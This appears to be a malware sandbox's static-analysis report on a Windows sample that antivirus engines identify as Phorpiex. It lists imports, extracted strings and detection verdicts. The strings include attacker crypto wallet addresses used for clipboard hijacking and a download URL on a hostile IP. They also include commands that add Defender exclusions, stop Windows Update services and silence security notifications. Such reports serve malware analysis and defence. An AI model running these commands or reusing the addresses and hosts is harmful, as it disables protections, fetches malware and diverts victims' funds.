popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2024-10-10 16:39:16

PE Imphash

9b21a4a268f5e1d101db096fb67e8aea

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000ed86 0x0000ee00 6.12711020998
.rdata 0x00010000 0x00003ff2 0x00004000 5.38944022546
.data 0x00014000 0x00002e90 0x00001c00 5.66411091605

Imports

Library WS2_32.dll:
0x410210 gethostname
0x410214 recvfrom
0x410218 setsockopt
0x41021c bind
0x410220 sendto
0x410224 ioctlsocket
0x410228 WSAStartup
0x41022c shutdown
0x410230 htons
0x410234 socket
0x410238 connect
0x410240 listen
0x410244 WSASocketA
0x410248 WSACreateEvent
0x410250 WSAEventSelect
0x410258 WSAGetLastError
0x41025c WSASend
0x410260 WSARecv
0x410264 WSACloseEvent
0x410268 accept
0x41026c getpeername
0x410270 getsockname
0x410274 inet_addr
0x410278 gethostbyname
0x41027c inet_ntoa
0x410280 closesocket
0x410284 recv
0x410288 send
Library SHLWAPI.dll:
0x41015c StrStrIA
0x410160 StrCmpNW
0x410164 StrStrW
0x410168 PathFileExistsW
0x41016c StrChrA
0x410170 PathFindFileNameW
0x410174 StrCmpNIA
0x410178 PathMatchSpecW
Library urlmon.dll:
0x410308 URLDownloadToFileW
Library WININET.dll:
0x4101d8 InternetOpenW
0x4101dc InternetOpenUrlW
0x4101e0 InternetReadFile
0x4101e4 DeleteUrlCacheEntry
0x4101e8 InternetCloseHandle
0x4101ec HttpSendRequestA
0x4101f0 HttpOpenRequestA
0x4101f4 InternetConnectA
0x4101f8 InternetOpenA
0x4101fc InternetCrackUrlA
0x410204 HttpQueryInfoA
0x410208 InternetOpenUrlA
Library ntdll.dll:
0x4102a0 strlen
0x4102a4 iswdigit
0x4102a8 iswalpha
0x4102ac memcpy
0x4102b0 memset
0x4102b8 RtlUnwind
0x4102bc _chkstk
0x4102c0 _aulldiv
0x4102c4 wcslen
0x4102c8 wcscmp
0x4102cc _allshl
0x4102d0 _aullshr
0x4102d4 strstr
0x4102d8 strcmp
0x4102dc memmove
0x4102e0 memcmp
0x4102e8 NtQuerySystemTime
0x4102ec mbstowcs
Library msvcrt.dll:
0x410290 _vscprintf
0x410294 srand
0x410298 rand
Library KERNEL32.dll:
0x410028 GetSystemInfo
0x41002c FindClose
0x410030 SetEvent
0x410034 CreateProcessW
0x410038 GetLocaleInfoA
0x410040 GetCurrentThread
0x410044 GetThreadPriority
0x410048 SetThreadPriority
0x41004c GetCurrentProcess
0x410050 DuplicateHandle
0x410054 IsBadReadPtr
0x410060 WaitForSingleObject
0x410068 InterlockedExchange
0x41006c HeapFree
0x410070 HeapValidate
0x410074 HeapReAlloc
0x410078 GetProcessHeaps
0x41007c HeapCreate
0x410080 HeapSetInformation
0x410084 GetCurrentProcessId
0x410088 HeapAlloc
0x41008c CreateMutexA
0x410090 GetLastError
0x410094 ExitProcess
0x410098 CreateEventA
0x41009c CreateThread
0x4100a0 GetModuleFileNameW
0x4100a8 GetDiskFreeSpaceExW
0x4100ac SetFileAttributesW
0x4100b0 CopyFileW
0x4100b4 lstrcmpiW
0x4100b8 CreateDirectoryW
0x4100bc FindFirstFileW
0x4100c0 lstrcmpW
0x4100c4 MoveFileExW
0x4100c8 FindNextFileW
0x4100d0 RemoveDirectoryW
0x4100d8 DeleteFileW
0x4100dc GetLogicalDrives
0x4100e0 GetDriveTypeW
0x4100e4 QueryDosDeviceW
0x4100e8 lstrcpyW
0x4100ec WriteFile
0x4100f0 FlushFileBuffers
0x410100 CreateFileW
0x410104 CreateFileMappingW
0x410108 MapViewOfFile
0x41010c GetFileSize
0x410110 UnmapViewOfFile
0x410114 lstrlenW
0x410118 GlobalUnlock
0x41011c GlobalLock
0x410120 GlobalAlloc
0x410124 lstrlenA
0x410128 lstrcpynW
0x41012c MultiByteToWideChar
0x410130 ExitThread
0x410134 GetTickCount
0x410138 Sleep
0x41013c GetModuleHandleW
0x410140 CloseHandle
Library USER32.dll:
0x410180 RegisterClassExW
0x410184 CreateWindowExW
0x410188 GetMessageA
0x41018c TranslateMessage
0x410190 wsprintfW
0x410194 DefWindowProcA
0x4101a0 GetClipboardData
0x4101a4 DispatchMessageA
0x4101a8 OpenClipboard
0x4101ac EmptyClipboard
0x4101b0 SetClipboardData
0x4101b8 SendMessageA
0x4101bc SetWindowLongW
0x4101c0 SetClipboardViewer
0x4101c4 GetWindowLongW
0x4101c8 wsprintfA
0x4101cc wvsprintfA
0x4101d0 CloseClipboard
Library ADVAPI32.dll:
0x410004 RegQueryValueExW
0x410008 RegOpenKeyExW
0x41000c RegSetValueExW
0x410010 CryptReleaseContext
0x410014 RegCloseKey
0x410018 CryptGenRandom
Library SHELL32.dll:
0x410154 ShellExecuteW
Library ole32.dll:
0x4102f4 CoInitializeEx
0x4102f8 CoUninitialize
0x4102fc CoInitialize
0x410300 CoCreateInstance
Library OLEAUT32.dll:
0x410148 SysFreeString
0x41014c SysAllocString
!This program cannot be run in DOS mode.
9Rich)
`.rdata
@.data
>ilciuo
L$$QRP
;PCOIu^
>ilciu
F(;F$s
>ilciu2
uZh<#A
tHhH&A
umh0$A
VC20XC00U
;t$(v(
UQPXY]Y[
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
mona1qwdqvzuwn6qj7l9xmsfqur2vc7uda0rcpftv9ej
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
QaBvbNAuoU52qCgbqsgoLAbK5P21L6dn5Y
RLefLLmDAZZb5ZynfPMjZ475pQdHVZNz9J
NASUHUTM7J5HNOJVZ2EULOP6INPNPSE4KN6AQNRI
Cz6xMbBst86mjM44qAaE5ahkD3F8JpLY7LFGHMiKYzwS6mn
via1qs8zt7jr4sgru6r8dqtdpc93c5d8wmwu8rkz94z
H42AN3K4hbqdprBnJVG8UFQzRZftKJM1EY
Wdv4zK4Fc9D2PJ9aePL9jUmdjvdQeoKV7Q
uhdnHQRJEBxePpLi6YhiS6Kxgct6vG7Q9f
grs1qscr354fdfddglta2hgajrcryl4gqh6ey360d3u
PCsLUHxdx4nFpp5RSYZ6YyJztgYRcErmQk
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
n1HHGP3YmZp3YA7VgqVgfJqyKBV86d9SaJo
4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD
8BXeKLC4rvUixuusetP2ZhYZicVqnU8FQV9mk5B9ZPsiYswxqrxqwnr4Tc3BhpvHz88jgY6qyXmqcZiTruLF3NKrEqmWdTj
SP1GK1GES8EXB6E15KQJ0EM169NQQNDZG8A2GDRZQ
SdRJvZ4LHuGxfsrnRuBcBYzxcQAyKU2MX6
aPFoyg69vKYCfnKGo1eLBo5XAmoyuZniGc
f1sz5wwh6urr3gsycgkki7ns5iino3a7bu3chsgly
f53ea9bd3352fd3b24be04fa27ce2171b21d1378e658c50553d804cfa70ceb64
dgb1qnyphwne0t26mmxh2amyzzxzerxarj6jmf8wpmr
dn1q3yrdfjppj9pqxqha4k4a690cd9a3mjkd8jku7m
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3
zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v
cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf
erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx
kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn
inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9
osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3
one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5
thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur
tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0
sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz
sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy
ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr
addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg
nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb
G35598989
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV
E36963824
EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM
B36461211
B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA
BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH
U33390790
UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb
http://185.215.113.66/
http://91.202.233.141/
www.update.microsoft.com
0.0.0.0
TCP: P2P_SendGETLPacket(0,%s) failed!
HTTP/1.1 200 OK
LOCATION:
239.255.255.250
M-SEARCH * HTTP/1.1
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
Man:"ssdp:discover"
HOST: 239.255.255.250:1900
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Content-Type: text/xml; charset="utf-8"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"/></SOAP-ENV:Body></SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
<NewInternalPort>%d</NewInternalPort>
<NewInternalClient>%s</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:DeletePortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost>%s</NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
</m:DeletePortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
WS2_32.dll
StrStrW
StrCmpNW
PathMatchSpecW
PathFileExistsW
StrChrA
PathFindFileNameW
StrStrIA
StrCmpNIA
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlW
InternetOpenW
DeleteUrlCacheEntry
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetOpenA
InternetCrackUrlA
HttpAddRequestHeadersA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
memcpy
strlen
memset
iswdigit
iswalpha
_chkstk
_aulldiv
wcslen
wcscmp
_allshl
_aullshr
strstr
strcmp
memmove
memcmp
RtlTimeToSecondsSince1980
NtQuerySystemTime
mbstowcs
ntdll.dll
RtlUnwind
NtQueryVirtualMemory
_vscprintf
msvcrt.dll
lstrlenW
GlobalUnlock
GlobalLock
GlobalAlloc
lstrlenA
lstrcpynW
MultiByteToWideChar
ExitThread
GetTickCount
GetModuleHandleW
CloseHandle
UnmapViewOfFile
GetFileSize
MapViewOfFile
CreateFileMappingW
CreateFileW
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
FlushFileBuffers
WriteFile
lstrcpyW
QueryDosDeviceW
GetDriveTypeW
GetLogicalDrives
DeleteFileW
ExpandEnvironmentStringsW
RemoveDirectoryW
FindClose
FindNextFileW
MoveFileExW
lstrcmpW
FindFirstFileW
CreateDirectoryW
lstrcmpiW
CopyFileW
SetFileAttributesW
GetDiskFreeSpaceExW
GetVolumeInformationW
GetModuleFileNameW
CreateThread
CreateEventA
ExitProcess
GetLastError
CreateMutexA
HeapAlloc
GetCurrentProcessId
HeapSetInformation
HeapCreate
GetProcessHeaps
HeapReAlloc
HeapValidate
HeapFree
InterlockedExchange
InterlockedDecrement
WaitForSingleObject
InterlockedIncrement
InterlockedExchangeAdd
IsBadReadPtr
DuplicateHandle
GetCurrentProcess
SetThreadPriority
GetThreadPriority
GetCurrentThread
DeleteCriticalSection
GetLocaleInfoA
CreateProcessW
KERNEL32.dll
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
DispatchMessageA
TranslateMessage
GetMessageA
CreateWindowExW
RegisterClassExW
wsprintfW
DefWindowProcA
ChangeClipboardChain
RegisterRawInputDevices
GetClipboardData
IsClipboardFormatAvailable
SendMessageA
SetWindowLongW
SetClipboardViewer
GetWindowLongW
wsprintfA
wvsprintfA
USER32.dll
RegCloseKey
RegQueryValueExW
RegOpenKeyExW
RegSetValueExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
CoCreateInstance
CoInitialize
CoUninitialize
CoInitializeEx
ole32.dll
OLEAUT32.dll
WSAWaitForMultipleEvents
WSASocketA
WSACreateEvent
WSAGetOverlappedResult
WSAEventSelect
WSAEnumNetworkEvents
WSASend
WSARecv
WSACloseEvent
SetEvent
GetQueuedCompletionStatus
PostQueuedCompletionStatus
GetSystemInfo
CreateIoCompletionPort
Oct 10 2024 00:39:06
Oct 10 2024 00:39:07
0123456789
0123456789abcdef
mmn7nnm8na
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
399257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
399257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857257952873527395927395728375987839759823798573987582379857
0123456789abcdef
T6G^ii
a .#WL
VhX)T5
jjjjjj
bitcoincash:
cosmos
bitcoincash:
ronin:
yronin:
bitcoincash:
cosmos
gnano_
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
%temp%
%s\%d%d.exe
%comspec%
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
http://185.215.113.66/tdrp.exe
%s:Zone.Identifier
/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe
/c start %s & start %s\rvlcfg.exe
%s.lnk
%s\%s\rvlcfg.exe
%s\%s\rvldrv.exe
shell32.dll
shell32.dll
shell32.dll
shell32.dll
Thumbs.db
$RECYCLE.BIN
desktop.ini
System Volume Information
%s\%s\%s
(%dGB)
Unnamed volume
Microsoft Corporation
%s:Zone.Identifier
%userprofile%
%windir%
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%temp%
Software\Microsoft\Windows\CurrentVersion\Run\
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmd.exe
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
cmd.exe
SYSTEM\CurrentControlSet\Services\UsoSvc
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc
SYSTEM\CurrentControlSet\Services\wuauserv
SYSTEM\CurrentControlSet\Services\DoSvc
SYSTEM\CurrentControlSet\Services\BITS
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
DisableWindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate
AlwaysAutoUpdate
OverrideNotice
SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator
DisableWindowsUpdate
AutoUpdateOptions
EnableWindowsUpdate
PreventDownload
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
%s\tbtnds.dat
%s\tbtcmds.dat
service
serviceType
serviceList
device
deviceType
deviceList
urn:schemas-upnp-org:device:InternetGatewayDevice:1
urn:schemas-upnp-org:device:WANDevice:1
urn:schemas-upnp-org:device:WANConnectionDevice:1
urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1
controlURL
URLBase
GetExternalIPAddressResponse
NewExternalIPAddress
6%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
%s:Zone.Identifier
%s\%d%d.exe
%s:Zone.Identifier
sysppvrdnvs.exe
Windows Settings
Antivirus Signature
Bkav W32.Common.E642E683
Lionic Trojan.Win32.Phorpiex.7!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Worm.Generic
Skyhigh BehavesLike.Win32.Generic.mh
ALYac Trojan.GenericKD.74476180
Cylance Unsafe
Zillya Worm.Phorpiex.Win32.3206
CrowdStrike win/malicious_confidence_100% (D)
Alibaba TrojanBanker:Win32/Phorpiex.db75a2fd
K7GW Trojan ( 005533551 )
K7AntiVirus Trojan ( 005533551 )
huorong TrojanSpy/Stealer.it
Baidu Clean
VirIT Trojan.Win32.Genus.WSC
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Phorpiex.V
APEX Malicious
Avast Win32:KadrBot [Trj]
Cynet Malicious (score: 100)
Kaspersky Trojan-Banker.Win32.ClipBanker.acow
BitDefender Trojan.GenericKD.74476180
NANO-Antivirus Trojan.Win32.Phorpiex.kspiyh
ViRobot Trojan.Win.Z.Phorpiex.85504
MicroWorld-eScan Trojan.GenericKD.74476180
Tencent Malware.Win32.Gencirc.141d0d0c
Sophos Mal/Generic-S
F-Secure Trojan.TR/AVI.Twizt.nopsy
DrWeb Trojan.Siggen29.49973
VIPRE Trojan.GenericKD.74476180
TrendMicro TROJ_GEN.R002C0DJO24
McAfeeD Real Protect-LS!06560B5E92D7
Trapmine malicious.high.ml.score
CTX exe.trojan.phorpiex
Emsisoft Trojan.GenericKD.74476180 (B)
Ikarus Trojan.Win32.Phorpiex
FireEye Generic.mg.06560b5e92d70439
Jiangmin Clean
Webroot Clean
Varist Clean
Avira TR/AVI.Twizt.nopsy
Fortinet W32/Phorpiex.V!worm
Antiy-AVL Clean
Kingsoft Win32.HeurC.KVMH012.a
Gridinsoft Trojan.Win32.Phorpiex.sa
Xcitium Malware@#1ny8378ets6m4
Arcabit Trojan.Generic.D4706A94
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Worm.Win32.Generic
Microsoft Trojan:Win32/Phorpiex.RA!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C4630408
Acronis Clean
McAfee Artemis!06560B5E92D7
TACHYON Clean
VBA32 Worm.Propriex
Malwarebytes Phorpiex.Trojan.Bot.DDS
Panda Adware/SecurityProtection
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DJO24
Rising Worm.Phorpiex!1.DF9C (CLASSIC)
Yandex Worm.Phorpiex!OmjwZqs2d3c
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.121218.susgen
GData Win32.Trojan.Phorpiex.D
AVG Win32:KadrBot [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.